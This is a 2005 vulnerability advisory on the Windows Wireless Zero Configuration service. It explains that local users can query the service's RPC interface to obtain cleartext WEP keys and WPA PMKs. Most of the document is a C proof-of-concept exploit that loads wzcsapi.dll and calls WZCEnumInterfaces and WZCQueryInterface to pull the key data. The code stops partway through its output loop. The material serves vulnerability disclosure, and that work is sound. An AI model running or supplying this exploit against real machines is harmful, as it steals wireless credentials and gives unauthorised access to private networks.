Microsoft Windows Wireless Zero Multiple Vulnerabilities (Information Disclosure, Authentication Bypass)
10 Oct. 2005
Summary
"The Wireless Zero Configuration system service enables automatic configuration for IEEE 802.11 wireless adapters for wireless communication."
The Wireless Zero Configuration system does not validate users and keeps sensitive information on memory. This allows local attackers to retrieve information about wireless network, and possibly bypass authentication.
The Wireless Zero Configuration system service has an RPC interface with some callable functions. RpcQueryInterface allows local users to get certain data about a wireless interface, for example the SSID/key pairs. The WEP keys are in clear text. The WPA pre-shared key is not disclosed, but the PMK is enough to connect to a wireless network (e.g. attackers can use http://hostap.epitest.fi/wpa_supplicant/ which accepts the PMK as an authentication data).
When "View Available Wireless Networks" is open, the WPA PMKs and WEP keys can be found in the memory of the explorer process. The dialog is implemented in wzcdlg.dll that uses wzcsapi.dll which implements WZCQueryInterface.
If attackers call the WZQueryInterface with the right parameters they can get the desired information.
Exploit:
//The code is not perfect, but demonstrates the given problem. If the API is changed the code can be easily broken.
//The code is released under GPL (http://www.gnu.org/licenses/gpl.html), by Laszlo Toth.
//Use the code at your own responsibility.
//http://www.soonerorlater.hu/index.khtml?article_id=62
typedef int (WINAPI* PQUERYI)(void*, int, void*, void*);
typedef int (WINAPI* PENUMI)(void*, GUID_STRUCT*);
int _tmain(int argc, _TCHAR* argv[])
{
//Load wzcsapi to use the implemented RPC interface of Wireless Zero
//Configuration Service
HMODULE hMod = LoadLibrary ("wzcsapi.dll");
if (NULL == hMod)
{
printf ("LoadLibrary failed\n");
return 1;
}
//Get the address of the WZCEnumInterfaces. We need the guid of the
//wireless devices.
PENUMI pEnumI = (PENUMI) GetProcAddress (hMod, "WZCEnumInterfaces");
if (NULL == pEnumI)
{
printf ("GetProcAddress pEnumI failed\n");
return 1;
}
//The call of WZCEnumInterfaces
int ret=pEnumI(NULL, &guids);
if (ret!=0){
printf("WZCEnumInterfaces failed!\n");
return 1;
}
//Get the address of the WZCQueryInterface
PQUERYI pQueryI = (PQUERYI) GetProcAddress (hMod, "WZCQueryInterface");
if (NULL == pQueryI)
{
printf ("GetProcAddress pQueryI failed\n");
return 1;
}
int j;
for(j=0;j<guids.count;j++){
wprintf(L"%s\n",guids.guids_ar[j]);
//memset(&iestr,0,sizeof(iestr));
iestr.guid=guids.guids_ar[j];
DWORD dwOutFlags=0;
//This was the debugged value of the second parameter.
//int ret=pQueryI(NULL,0x040CFF0F, ie, &dwOutFlags);
ret=pQueryI(NULL,0xFFFFFFFF, &iestr, &dwOutFlags);
if (ret!=0){
printf("WZCQueryInterface failed!\n");
return 1;
}
//This code is still messy...
if (iestr.ssidlist==NULL){
wprintf(L"There is no SSIDS for: %s!\n", iestr.guid);
}else{
